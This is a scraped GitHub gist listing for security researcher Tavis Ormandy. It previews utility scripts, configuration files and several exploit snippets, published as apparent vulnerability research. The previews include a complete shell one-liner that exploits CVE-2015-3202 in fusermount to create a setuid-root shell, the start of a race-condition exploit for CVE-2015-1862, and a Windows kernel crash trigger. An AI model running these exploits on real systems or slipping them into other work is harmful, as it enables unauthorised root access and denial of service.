Skip to content

Instantly share code, notes, and snippets.

View taviso's full-sized avatar
🎈

Tavis Ormandy taviso

🎈
2.9k followers · 3 following
View GitHub Profile
@taviso
taviso / .Xresources
Last active April 4, 2024 10:13
XTerm Configuration
! XTerm resources
!
! Remember to run `xrdb < .Xresources` after changing anything.
!
! Tavis Ormandy <taviso@gmail.com>
! Set the default UI font (menus, toolbar, etc)
XTerm*XftFont: Segoe UI:size=10:antialias=true:style=Regular
! Color of UI Components
@taviso
taviso / delete-twitter-dm.js
Created November 3, 2017 16:33
Automate deleting twitter direct messages.
// Open direct messages window, paste this into console.
function deleteNextConversation()
{
if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) {
clearInterval(tmr)
return;
}
dm.firstChild.click();
setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000);
@taviso
taviso / msdn.sh
Created July 12, 2019 22:30
Read MSDN pages in a terminal.
# man equivalent for msdn pages so I can look them up in the console.
function msdn()
{
local lucky="https://www.google.com/search?btnI"
local query="q=site:docs.microsoft.com+inurl:/en-us/windows/desktop/"
local title="Microsoft Developer Network"
local cache="${HOME}/.msdn/"
if ! type lynx > /dev/null; then
echo "error: lynx is not installed, please install it." 1>&2
@taviso
taviso / emoji.sh
Created August 29, 2019 18:14
UNIX signals as emoji
declare -ar _status=(
[ 0]=😀 # Success
[ 1]=🤨 # Error
[129]=📞 # SIGHUP
[130]=🛑 # SIGINT
[131]="(╯°□°)╯︵ ┻━┻" # SIGQUIT
[132]=👮 # SIGILL
[133]=🐍 # SIGTRAP
[134]=💥 # SIGABRT
@taviso
taviso / raceabrt.c
Created April 14, 2015 13:37
Race condition exploit for CVE-2015-1862
#include <stdlib.h>
#include <unistd.h>
#include <stdbool.h>
#include <stdio.h>
#include <signal.h>
#include <err.h>
#include <string.h>
#include <alloca.h>
#include <limits.h>
#include <sys/inotify.h>
@taviso
taviso / recycle.c
Last active July 29, 2022 01:56
recycle PID
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <stdbool.h>
#include <stdlib.h>
#include <err.h>
#include <sys/types.h>
#include <sys/wait.h>
@taviso
taviso / fwpacl.c
Created May 14, 2020 00:37
Attempt to reset a FWP Engine Security Descriptor.
#include <stdio.h>
#include <windows.h>
#include <fwpmu.h>
#include <sddl.h>
#include <malloc.h>
//
// Attempt to reset a FWP Engine Security Descriptor.
// For https://github.com/henrypp/simplewall/issues/680
@taviso
taviso / CVE-2015-3202
Created May 21, 2015 12:52
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
a=/tmp/.$$;
# $b is used twice, first to build the contents of shellscript $a, and then as
@taviso
taviso / pmftool.c
Created February 27, 2013 19:55
Quick tool to generate PMF files for process monitor without having to use the GUI.
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdbool.h>
#include <iconv.h>
#include <string.h>
#include <assert.h>
// Quick utility to generate Process Monitor filter sets for testing.
// Tavis Ormandy <taviso@cmpxchg8b.com>
@taviso
taviso / DefText.c
Created November 8, 2017 17:16
NtUserDefSetText() in Windows 10 will panic if you set the ansi flag incorrectly.
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "user32")
#pragma comment(lib, "gdi32")
typedef struct _LARGE_STRING {
ULONG Length;
ULONG MaximumLength:31;